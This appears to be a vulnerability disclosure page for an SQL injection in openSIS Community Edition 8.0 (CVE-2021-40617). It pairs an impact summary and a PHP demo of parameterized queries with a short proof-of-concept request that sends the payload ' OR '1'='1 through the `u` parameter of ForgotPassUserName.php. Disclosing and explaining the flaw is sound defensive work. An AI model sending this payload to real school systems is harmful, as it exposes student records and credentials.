openSIS Community Edition 8.0 contained critical SQL Injection vulnerabilities.
These flaws allowed attackers to manipulate database queries by injecting
malicious SQL code into various input fields. Notably, parameters like
`student_id` in `Students.php` were susceptible.
Exploitation enabled unauthorized access, data extraction (e.g., student
records, teacher details, admin credentials), and data manipulation
(e.g., altering grades). The impact was severe, leading to full data
compromise and potential administrative control over the application.
Mitigation required robust input validation and parameterized queries.
Users were urged to update to patched versions to address these critical flaws.
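The mitigation named above, shown as an added example (not openSIS code and not from the exploit author): the same lookup written with string concatenation and with a bound, allow-listed query, fed the `u` value from the proof-of-concept request on this page. The `login` table, its rows, the function names, the allow-list values and the use of PDO with in-memory SQLite are assumptions made so the script runs offline.

```php
<?php
// Added example: constructed schema and rows, not openSIS code.
// Assumes PHP with the pdo_sqlite extension so it runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE login (username TEXT, user_type TEXT)');
$pdo->exec("INSERT INTO login VALUES ('alice','student'),('bob','student'),('root','admin')");

// Weak pattern: request data is concatenated into the SQL text, so a quote
// in $u ends the string literal and the rest is parsed as SQL.
function countConcatenated(PDO $pdo, string $u, string $userType): int
{
    $sql = "SELECT COUNT(*) FROM login
            WHERE user_type = '$userType' AND username = '$u'";
    return (int) $pdo->query($sql)->fetchColumn();
}

// Hardened pattern: allow-list the enumerated field, bind everything else.
function countParameterized(PDO $pdo, string $u, string $userType): int
{
    $allowedTypes = ['student', 'staff', 'parent']; // hypothetical allow-list
    if (!in_array($userType, $allowedTypes, true)) {
        throw new InvalidArgumentException('unexpected user_type');
    }
    $stmt = $pdo->prepare(
        'SELECT COUNT(*) FROM login WHERE user_type = :t AND username = :u'
    );
    $stmt->execute([':t' => $userType, ':u' => $u]);
    return (int) $stmt->fetchColumn();
}

// `u` and `user_type` exactly as they appear in the request on this page.
$u = urldecode('test%27%20OR%20%271%27%3D%271');
$userType = 'student';

printf("decoded u:      %s\n", $u);
printf("concatenated:   %d rows matched\n", countConcatenated($pdo, $u, $userType));
printf("parameterized:  %d rows matched\n", countParameterized($pdo, $u, $userType));
```

In the concatenated form the trailing `OR '1'='1'` makes the `WHERE` clause true for every row of the constructed table; with bound parameters the whole value is compared as a literal username and matches none.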
# Exploit Title: openSIS Community Edition 8.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/OS4ED/openSIS-Classic
# Software Link: https://github.com/OS4ED/openSIS-Classic
# Version: 8.0
# Tested on: Windows
# CVE : CVE-2021-40617
Proof Of Concept
GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1
Host: opensis
Connection: close
Steps to Reproduce
Log in as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie.
Observe the result.
openSIS Community Edition 8.0 SQL Injection
- Written by: khalil shreateh